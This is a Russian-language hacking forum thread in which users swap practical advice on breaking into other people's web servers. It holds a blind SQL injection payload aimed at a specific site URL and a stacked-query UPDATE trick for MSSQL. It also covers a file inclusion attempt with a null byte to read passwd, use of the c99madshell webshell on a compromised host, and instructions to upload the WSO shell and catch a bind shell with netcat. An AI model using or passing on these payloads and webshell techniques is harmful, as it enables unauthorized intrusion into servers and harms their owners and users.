Ты перебор как будешь организовывать? Или значения полей тоже по словарю? Тогда и такой способ пойдёт Статью прочти, которую я дал в том посте
Ок,спасибо,буду разбираться. http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/* А какой смысл этого запроса,если все равно экран пустой? Ответь плз.
А какой он должен быть, если скрипт вообще ничего не выводит? Это blind. Пустой экран - TRUE , more than 1 row - FALSE Статью прочти, которую я дал в том посте
есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..
в mysql - нет, если конечно скуля не в запросе "update". а в mssql теоретически можно так script.php?id=4;update.....
понял спасибо, еще такая проблемка, нашел пхп инъекцию, в lang= открываются пхп файлы, ибо там автоматом уже прописывается .php т.е ошибка выходит типа: Warning: main(lang/../../.php) , как мне обойти разрешение это? и посмотреть passwd и еще чтото. ставлю в конец %00 итог: Warning: main(lang/../../\0.php):
https://forum.antichat.ru/thread98525.html Если того что тема прикреплена уже мало, мб начать красить названия тем в цвета радуги и что бы их названия как баннеры на половину браузера вылезали?
Скажите в чём причина,никак не компилируются Файлы не серве с вебшелом c99madshell!? Gcc есть uname -a: Software: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-3 with Suhosin-Patch uname -a: Linux yesclub 2.6.18-6-686 #1 SMP Sun Feb 10 22:11:31 UTC 2008 i686 uid=33(www-data) gid=33(www-data) groups=33(www-data) Safe-mode: OFF (not secure) И подскажите рабочий эксплойт под это систему. И ещё при конекте через Puty на бинд порт все строки сдвигаются,комынды не выполняются,всегда пишет comand not found,что бы не писал.
2p.r0phe.t Залей шелл WSO. Там есть ф-я бинд порт. У себя поставь NetCat, и вбей команду(у себя) nc -l -p 31336 В шелле вбивай свой ip и жми bind (выбирай перловый бинд). Смотри в свойю cmd, увидишь консоль сервака. И там уже компели.
